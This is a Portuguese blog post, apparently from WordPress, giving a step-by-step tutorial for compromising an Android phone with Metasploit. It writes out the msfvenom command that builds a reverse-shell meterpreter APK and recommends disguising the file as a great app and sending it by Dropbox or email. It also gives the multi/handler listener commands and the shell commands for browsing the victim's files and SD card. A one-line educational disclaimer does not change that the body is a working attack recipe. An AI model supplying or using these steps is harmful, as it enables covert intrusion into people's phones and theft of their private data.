COMO HACKEAR O ANDROID USANDO METASPLOITS

Eu já abordei o uso de Metasploits em KALI LINUX , portanto, para um melhor entendimento, recomendo a leitura desse post; pois não serei repetitivo.

OBSERVAÇÃO:

O procedimento a seguir, foi executado em laboratório, este post é para fins educativos. Por favor, não invada a privacidade de ninguém sem permissão.

REQUISITOS:

– Kali Linux instalado em uma máquina virtual

– A VÍTIMA DEVE ESTAR NA MESMA REDE DE WIFI.

COMO HACKEAR O ANDROID USANDO METASPLOITS

  1. Abri o terminal do Kali Linux e escrevi o seguinte comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 R > andro.apk

“Substitui xxx.xxx.xxx.xxx pelo meu endereço IP (foi só digitar myip address na pesquisa do Google)”.

ANDRO-01

  1. Agora, que o payload foi criado, enviei ao telefone vítima; normalmente os invasores fazem isso através do Dropbox, e-mail ou qualquer outra maneira que a vítima possa abri-lo! Fingem que se trata de um ótimo aplicativo e você deve instalar.

ANDRO-02

  1. A seguir, digitei:

msfconsole

e abri no aparelho da vítima

  1. Digitei:

use multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST xxx.xxx.xxx.xxx

set LPORT 4444

exploit

ANDRO-03

  1. Agora, quando a vítima executar o aplicativo – ele ficará todo tempo em background (segundo plano) até que o aparelho seja reinicializado – e o invasor verá a abertura de uma sessão.

ANDRO-04

  1. Ao digitar:

shell

ls

… pude ver todas as pastas na raiz do celular Android vítima

8. Para acessar o cartão de memória, bastou digitar

cd sdcard

ls

ANDRO-06

Aguardem o próximo post, será um complemento deste.

Anúncios

5 comentários

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

Conectando a %s